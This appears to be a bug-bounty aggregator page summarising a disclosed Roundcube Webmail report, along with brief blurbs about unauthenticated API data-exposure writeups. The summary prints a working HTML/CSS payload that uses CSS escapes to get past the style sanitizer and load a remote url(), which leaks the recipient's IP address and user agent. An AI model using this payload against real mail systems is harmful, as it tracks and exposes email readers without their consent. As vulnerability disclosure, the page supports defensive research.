Vulnerability Summary
HackerOne disclosed report --> https://hackerone.com/reports/3443563 by somerandomdev
The style sanitizer in Roundcube Webmail can be bypassed by creating HTML entities using CSS character escapes. This allows using arbitrary inline CSS, like e.g. url(), and retrieve the IP address and user agent of the person reading the email.
<div style='content: "\0026quot;; background: url(//http.cat/418); content:""; width: 100%; height: 100%;'>hi, this shouldn't work :(</div>
pyus3rA hardcoded backend URL found in a JavaScript bundle exposed an unauthenticated API endpoint that returned 500+ records containing employee full names, enterprise client details, and internal database IDs. The writeup walks through discovering the URL in the JS bundle, querying the API, and the GDPR/business intelligence impact.
pyus3rThis writeup details an Information Disclosure (CWE-200) vulnerability that allowed viewing the source code and complete domain model mapping of a corporate backend.
pyus3rAn unprotected endpoint allowed the exfiltration, via a simple unauthenticated POST request, of gigabytes of configurations, structural metadata, and private personal/corporate information belonging to the organizations using the software.
No comments yet.
Be the first to share your thoughts
Log in to join the discussion.
Sign In